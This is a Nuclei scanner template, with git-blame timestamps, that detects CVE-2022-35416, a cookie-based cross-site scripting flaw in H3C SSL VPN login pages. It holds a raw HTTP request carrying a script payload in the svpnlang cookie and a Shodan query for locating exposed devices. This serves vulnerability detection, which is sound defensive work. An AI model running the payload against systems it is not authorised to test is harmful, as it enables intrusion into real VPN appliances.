nuclei-templates/http/cves/2022/CVE-2022-35416.yaml

50 lines
1.2 KiB
YAML
Raw Normal View History

2022-07-14 10:44:12 +00:00
id: CVE-2022-35416
info:
name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting
2022-07-14 10:44:12 +00:00
author: 0x240x23elu
severity: medium
2022-07-14 10:44:12 +00:00
description: |
H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang.
2022-07-14 10:44:12 +00:00
reference:
- https://github.com/advisories/GHSA-9x76-78gc-r3m9
- https://github.com/Docker-droid/H3C_SSL_VPN_XSS
- https://nvd.nist.gov/vuln/detail/CVE-2022-35416
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-35416
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00078
cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:*
2022-07-14 10:44:12 +00:00
metadata:
max-request: 1
2022-07-14 10:44:12 +00:00
shodan-query: http.html_hash:510586239
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: h3c
product: ssl_vpn
2022-07-14 10:44:12 +00:00
tags: cve,cve2022,xss,vpn,h3c
http:
2022-07-14 10:44:12 +00:00
- raw:
- |
GET /wnm/login/login.json HTTP/1.1
Host: {{Hostname}}
Cookie: svpnlang=<script>alert('document.domain')</script>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert('document.domain')</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200